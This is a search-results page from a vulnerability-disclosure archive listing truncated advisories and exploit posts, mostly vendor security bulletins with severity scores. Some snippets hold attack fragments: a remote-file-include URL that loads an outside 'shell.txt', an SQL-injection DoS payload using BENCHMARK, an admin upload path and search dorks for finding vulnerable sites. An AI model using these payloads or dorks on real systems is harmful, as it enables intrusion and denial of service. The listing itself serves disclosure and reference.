Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2014/05/01 12:0 a.m.304 views

[security bulletin] HPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, Remote Disclosure of Information

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04261644 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04261644 Version: 2 HPSBST03015 rev....

5CVSS0.3AI score0.99999EPSS
Exploits87
securityvulns
securityvulns
added 2015/11/02 12:0 a.m.303 views

Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities

Quarterly update closes 140 vulnerabilities in different applications...

10CVSS2.1AI score0.9986EPSS
Exploits70References7Affected Software56
securityvulns
securityvulns
added 2011/07/26 12:0 a.m.303 views

Precision (products.php?cat_id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Precision products.php?catid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.groupprecision.com/ Persian Gulf 4 Ever! Dork : "powered by Precision"...

3.8AI score
Exploits0
securityvulns
securityvulns
added 2007/03/25 12:0 a.m.303 views

htmltonuke 2.0alpha for postnuke & PHP-Nuke(htmltonuke.php) Remote File Include Vulnerabilities

htmltonuke 2.0alpha for postnuke & PHP-Nukehtmltonuke.php Remote File Include Vulnerabilities script :http://www.desarrollonuke.org http://up.9q9q.net/up/index.php?f=ddAvVTUSs file : /htmltonuke.php Dork : "/nuke/htmltonuke.php" - "htmltonuke.php" Found by & Contact : Cold z3ro ,...

Exploits0
securityvulns
securityvulns
added 2006/11/22 12:0 a.m.303 views

ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability

Title : ASPNuke = 0.80 register.asp Remote SQL Injection Vulnerability Author : ajann S.Page : http://www.aspnuke.com D.Page : http://sourceforge.net/project/showfiles.php?groupid=92470 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ASP Nuke...

1AI score
Exploits0
securityvulns
securityvulns
added 2001/04/16 12:0 a.m.302 views

[SECURITY] [DSA-046-1] exuberant-ctags uses insecure temporary files

-----BEGIN PGP SIGNED MESSAGE----- - ------------------------------------------------------------------------ Debian Security Advisory DSA-046-1 [email protected] http://www.debian.org/security/ Wichert Akkerman April 15, 2001 -...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2014/04/20 12:0 a.m.301 views

[security bulletin] HPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote Disclosure of Information

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04239375 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04239375 Version: 1 HPSBMU02997 rev....

5CVSS0.4AI score0.99999EPSS
Exploits87
securityvulns
securityvulns
added 2008/12/14 12:0 a.m.301 views

aspProductCatalog Sql Injection

aspProductCatalog Sql Injection AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina Yazdanmehr - Hadi Kiamarsi Download :...

2.2AI score
Exploits0
securityvulns
securityvulns
added 2007/06/19 12:0 a.m.301 views

Local File Include Vulnerabilities in YaBB <= 2.1(all version)

Local File Include Vulnerabilities Problem: Local File Include Vulnerabilities Product: YaBB = 2.1all version Web page:http://www.yabbforum.com/ Credit:Maciej krasza Kukla @mail:[email protected] homepage:www.krasza.int.pl 1.Description "YaBB is a leading free forum software package that rivals an...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2005/04/23 12:0 a.m.301 views

[SePro Bugtraq] WBB - WoltLab Burning Board <= 2.3.1 - XSS Vulnerability (22.04.05)

SePro Bugtraq WBB - WoltLab Burning Board = 2.3.1 - XSS Vulnerability 22.04.05 Vendor: WoltLab URL: http://www.woltlab.de/ Version: = 2.3.1 Type: XSS Discovered by deluxe89 Description: -------------------------------- The WoltLab Burning Board is a high customisable forum software for every kind...

6.1AI score
Exploits0
securityvulns
securityvulns
added 2015/11/02 12:0 a.m.300 views

[USN-2786-1] PHP vulnerabilities

========================================================================== Ubuntu Security Notice USN-2786-1 October 28, 2015 php5 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

6.8CVSS0.2AI score0.10288EPSS
Exploits0
securityvulns
securityvulns
added 2015/11/02 12:0 a.m.300 views

[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability

ADVISORY INFORMATION Title: Oracle E-Business Suite Cross-site Scripting Advisory ID: ERPSCAN-15-027 Advisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/ Date published: 20.10.2015 Vendors contacted: Oracle 2. VULNERABILITY...

4.3CVSS6.4AI score0.03152EPSS
Exploits0
securityvulns
securityvulns
added 2010/02/10 12:0 a.m.300 views

Microsoft Security Bulletin MS10-015 - Important Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165)

Microsoft Security Bulletin MS10-015 - Important Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege 977165 Published: February 09, 2010 Version: 1.0 General Information Executive Summary This security update resolves one publicly disclosed and one privately reported vulnerabilit...

7.2CVSS1.4AI score0.29253EPSS
Exploits13
securityvulns
securityvulns
added 2006/05/01 12:0 a.m.300 views

JMK's Picture Gallery admin login

dork: "JMK's Picture Gallery" and last path to add : admingallery.php3?action=add&upload=1 example:hhtp://www.site.com/path/.../admingallery.php3?action=add&upload=1 credits:AlpEren,tugr@...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2005/07/12 12:0 a.m.300 views

[SA16009] Squito Gallery "photoroot" File Inclusion Vulnerability

---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2012/09/03 12:0 a.m.299 views

Flogr v2.5.6 & v2.3 - Cross Site Script Vulnerabilities

Title: ====== Flogr v2.5.6 & v2.3 - Cross Site Script Vulnerabilities Date: ===== 2012-07-11 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=656 VL-ID: ===== 656 Common Vulnerability Scoring System: ==================================== 2 Introduction: ============= Flog...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2007/07/13 12:0 a.m.299 views

iDefense Security Advisory 07.12.07: Red Hat Enterprise Linux init.d XFS Script chown Race Condition Vulnerability

Red Hat Enterprise Linux init.d XFS Script chown Race Condition Vulnerability iDefense Security Advisory 07.12.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 12, 2007 I. BACKGROUND XFS is the X Font Server, and is used to render fonts for the X Window System. "init.d" refers to the...

6.2CVSS5.4AI score0.00902EPSS
Exploits6
securityvulns
securityvulns
added 2007/10/10 12:0 a.m.298 views

Linux mount / umount privilege escalation

Invalid order of setuid / setgid calls and unchecked return value...

6.9CVSS3.3AI score0.0044EPSS
Exploits0References1
securityvulns
securityvulns
added 2005/12/26 12:0 a.m.297 views

[Full-disclosure] Advanced Guestbook remote XSS exploit

Advanced Guestbook 2.2 and 2.3.1 and possibly other versions remote XSS vulnerabilities By: Handrix handrixatmorxorg 16 December 2005 MorX security research team www.morx.org Description: Advanced Guestbook is a PHP-based guestbook script. index.php and comment.php scripts are vulnerable to XSS...

1.1AI score
Exploits0
securityvulns
securityvulns
added 2014/08/11 12:0 a.m.296 views

[security bulletin] HPSBHF03084 rev.1 HP PCs with UEFI Firmware, Execution of Arbitrary Code

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04393276 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04393276 Version: 1 HPSBHF03084 rev....

0.00587EPSS
Exploits0
securityvulns
securityvulns
added 2013/05/06 12:0 a.m.296 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.5CVSS1.6AI score0.7322EPSS
Exploits87References48Affected Software38
securityvulns
securityvulns
added 2008/02/27 12:0 a.m.296 views

Cups multiple security vulnerabilities

Code execution on URI handling, multiple DoS conditions...

10CVSS1.6AI score0.06765EPSS
Exploits3References1Affected Software1
securityvulns
securityvulns
added 2000/04/22 12:0 a.m.295 views

Remote vulnerability in LCDproc 0.4

-----BEGIN PGP SIGNED MESSAGE----- ============================================================== === Title: Vulnerability in LCDproc === === Date: 20 April 2000 === === Author: Andrew Hobgood [email protected] === ============================================================== Note: The LCDproc...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2014/04/20 12:0 a.m.293 views

[security bulletin] HPSBMU02995 rev.1 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, Performance Center, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04236102 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04236102 Version: 1 HPSBMU02995 rev....

5CVSS0.4AI score0.99999EPSS
Exploits87
securityvulns
securityvulns
added 2007/04/28 12:0 a.m.293 views

IE 7 and Firefox Browsers Digest Authentication Request Splitting

Title IE 7 and Firefox Browsers Digest Authentication Request Splitting Systems Affected Internet Explorer 7.0.5730.11 FF 2.0.0.3 Severity Medium Vendor http://www.microsoft.com/ & http://www.mozilla.com Advisory http://www.wisec.it/vulns.php?id=11 Authors Stefano Wisec Di Paola...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2003/09/23 12:0 a.m.293 views

mpg123[v0.59r,v0.59s]: remote client-side heap corruption exploit.

did an audit of mpg123my mp3 player of choice, found a remotely exploitable bug in audio streaming servicehttpget.c; applies to v0.59r and v0.59spre, up to current as of writing this. the exploit comments explain how it works and how to find the memory addresses neededif not already a target valu...

7.9AI score
Exploits0
securityvulns
securityvulns
added 2010/03/15 12:0 a.m.292 views

CVE-2010-0188 Exploit Code

Exploit Title: Adobe Acrobat libtiff Remote Code Execution Date: 2010-03-12 Author: villy http://bugix-security.blogspot.com/ Software Link: http://adobe.com/ Version: Adobe Reader 9.x 9.3.1 Tested on: windows xpsp2 and xp3 CVE : CVE-2010-0188 Full python code on the link :...

9.3CVSS3.3AI score0.88246EPSS
Exploits12
securityvulns
securityvulns
added 2006/08/02 12:0 a.m.292 views

artlinks Mambo Component <= Remote Include Vulnerability

artlinks Mambo Component = Remote Include Vulnerability Rish : High Class : Remote Script : artlinks Thanx : www.lezr.com/vb & All kuwait hackers d0rkiz : allinurl:"comartlinks" http://www.site.com/components/comartlinks/artlinks.dispnew.php?mosConfigabsolutepath=http://shell.txt by Dr.Jr7...

1.4AI score
Exploits0
securityvulns
securityvulns
added 2001/03/21 12:0 a.m.292 views

def-2001-13: NTMail Web Services DoS

====================================================================== Defcom Labs Advisory def-2001-13 NTMail Web Services DoS Author: Peter Grьndl [email protected] Release Date: 2001-03-20 ====================================================================== ------------------------=Bri...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2001/02/13 12:0 a.m.292 views

PALS Library System "show files" Vulnerability and remote command execution

Name: PALS Library System "show files" Vulnerability and remote command executiom. Date: 02.02.2001 About: This script is derived from an idea originated at St.Olaf College to provide a www interface to the PALS Library System. This idea was then worked on at Georgia State University. This versio...

2.9AI score
Exploits0
securityvulns
securityvulns
added 2015/11/02 12:0 a.m.291 views

PHP security vulnerabilities

PHAR extension DoS...

6.8CVSS2.2AI score0.10288EPSS
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2009/04/10 12:0 a.m.291 views

Geeklog <=1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit

?php / Geeklog =1.5.2 SECauthenticate/PHPAUTHUSER sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.geeklog.net/ credit goes to rgod, bug found more than a year ago working against PHP = 5.0 google dorks: "By Geeklog" "Creat...

8AI score
Exploits0
securityvulns
securityvulns
added 2008/05/04 12:0 a.m.291 views

Maian Guestbook v3.2 XSS Vulnerabilities

---------------------------------------------------------------- Script : Maian Guestbook v3.2 Type : XSS Vulnerabilities ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2007/05/15 12:0 a.m.291 views

[SAMBA-SECURITY] CVE-2007-2447: Remote Command Injection Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ========================================================== == == Subject: Remote Command Injection Vulnerability == CVE ID: CVE-2007-2447 == == Versions: Samba 3.0.0 - 3.0.25rc3 inclusive == == Summary: Unescaped user input parameters are passed == as...

6CVSS0.8AI score0.49759EPSS
Exploits15
securityvulns
securityvulns
added 2000/05/20 12:0 a.m.291 views

Security Bulletin (MS00-029)

Microsoft Security Bulletin MS00-029 - -------------------------------------- Patch Available for "IP Fragment Reassembly" Vulnerability Originally Posted: May 19, 2000 Summary ======= Microsoft has released a patch that eliminates a security vulnerability in Microsoftr Windowsr 95, Windows 98,...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2008/05/08 12:0 a.m.290 views

mvnForum 1.1 Cross Site Scripting

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 mvnForum Cross Site Scripting Vulnerability Original release date: 2008-04-27 Last revised: 2008-05-06 Latest version: http://users.own-hero.net/decoder/advisories/mvnforum-jsxss.txt Source: Christian Holler http://users.own-hero.net/decoder/ Systems...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2007/03/16 12:0 a.m.290 views

MS07-012 Not Fixed

The MS07-012 patch that came out on Black Tuesday in Feb 2007 is not a complete solution to the problem. Title: MFC42u.dll Off-by-Two Overflow Date: 15 March 2007 Affected: Windows 2000, XP, 2003 those that were affected by the MS07-012 patch Reported by: Greg Sinclair gssincla...nnlsoftware.com...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2006/12/01 12:0 a.m.290 views

Invision Gallery 2.0.7 SQL Injection Vulnerability

Invision Gallery 2.0.7 DOS attak can be performed index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN SELECT BENCHMARK10000000,BENCHMARK10000000,md5currentdate FROM ipbgalleryimages...

2.2AI score
Exploits0
securityvulns
securityvulns
added 2015/05/18 12:0 a.m.289 views

SEC Consult SA-20150514-0 :: Multiple vulnerabilities in Loxone Smart Home (part 2)

SEC Consult Vulnerability Lab Security Advisory 20150514-0 ======================================================================= title: Multiple vulnerabilities product: Loxone Smart Home vulnerable version: Firmware version 6.4.5.12 fixed version: 6.4.5.12 impact: Critical homepage:...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2014/10/05 12:0 a.m.289 views

NEW VMSA-2014-0010 - VMware product updates address critical Bash security vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VMware Security Advisory Advisory ID: VMSA-2014-0010 Synopsis: VMware product updates address critical Bash security vulnerabilities Issue date: 2014-09-30 Updated on: 2014-09-30 Initial Advisory CVE numbers: CVE-2014-6271, CVE-2014-7169, CVE-2014-718...

10CVSS7.9AI score0.99999EPSS
Exploits142
securityvulns
securityvulns
added 2011/01/28 12:0 a.m.289 views

Huawei HG default WEP/WPA generator

Hi, Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks. It is possible to generate the default WEP/WPA key from the MAC address. The following documents detail the process of developing a key generator for these devices. English: http://websec.ca/blog/view/mac2wepkeyhuawei Espao...

1.2AI score
Exploits0
securityvulns
securityvulns
added 2006/12/20 12:0 a.m.289 views

PHPFanBase (protection.php) Remote File Include Vulnerability

--------------------------------------|| Viva Palestine ||----------------------------------------- --------------------------------------|| Free Saddam Hussien ||----------------------------------------- PHPFanBase protection.php Remote File Include Vulnerability Found By : CoLd Zero Wasem898...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2014/05/07 12:0 a.m.288 views

Cyberduck protection bypass

Invali FTP-SSL root ceritificates check...

4.3CVSS2.3AI score0.00935EPSS
Exploits2References1Affected Software1
securityvulns
securityvulns
added 2010/10/13 12:0 a.m.288 views

Oracle Critical Patch Update Advisory - October 2010

Oracle Critical Patch Update Advisory - October 2010 Description A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required because of interdependencies by those security patches. Critical Patch Updates are...

10CVSS0.1AI score0.87264EPSS
Exploits38
securityvulns
securityvulns
added 2003/04/26 12:0 a.m.288 views

IdeaBox: Remote Command Execution

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: IdeaBox: Remote Command Execution product: IdeaBox 1.0 vendor: http://ideabox.phpoutsourcing.com risk: high date: 04/25/2k3 discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus.ru/bz/022.en.txt http://f0kp.iplus.ru/bz/022.ru.tx...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2015/10/25 12:0 a.m.287 views

Apple Mac OS X / Mac EFI / OS X Server multiple security vulnerabilities

Code execution, information disclosure, restrictions bypass, multiple memory corruptions, multiple libraries vulnerabilities...

10CVSS2.2AI score0.94859EPSS
Exploits118References4Affected Software1
securityvulns
securityvulns
added 2010/05/20 12:0 a.m.287 views

XSS vulnerability in JComments, Joomla

Vulnerability ID: HTB22368 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinjcommentsjoomla.html Product: JComments Vendor: JoomlaTune .com Vulnerable Version: 2.1.0.0 07/08/2009 and Probably Prior Versions Vendor Notification: 04 May 2010 Vulnerability Type: XSS Cross Site Scripting...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2007/04/02 12:0 a.m.287 views

MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability

Mangobery-0.5.5 Found by kezzap66345 Script Page:http://mangobery.sourceforge.net/ Demo Site:http://mangobery.beryllium.ca/ Script Download:http://sourceforge.net/project/showfiles.php?groupid=63834&packageid=60858 Dork:http://www.google.com.tr/search?hl=tr&q=22MangoBery+1.0+Alpha22&meta= ERROR1:...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2001/03/26 12:0 a.m.287 views

MDaemon IMAP Denial Of Service

Advisory Name:MDaemon IMAP Denial Of Service Discovered:23rd Of March 2001 Application:Alt-N Technologies MDaemon 3.5.6 - Other versions most likely prior to this Platform:Windows 2k,95/98/NT - others unknown Severity:Denial of service from application Credit:[email protected] Vendor Status:Unkno...

2.2AI score
Exploits0
securityvulns
securityvulns
added 2013/03/11 12:0 a.m.286 views

SEC Consult SA-20130308-0 :: Multiple critical vulnerabilities in GroundWork Monitor Enterprise (part 1)

SEC Consult Vulnerability Lab Security Advisory 20130308-0 ======================================================================= title: Multiple critical vulnerabilities part 1 product: GroundWork Monitor Enterprise vulnerable version: 6.7.0 fixed version: none - optional technical bulletin...

0.5AI score
Exploits0
Total number of security vulnerabilities5000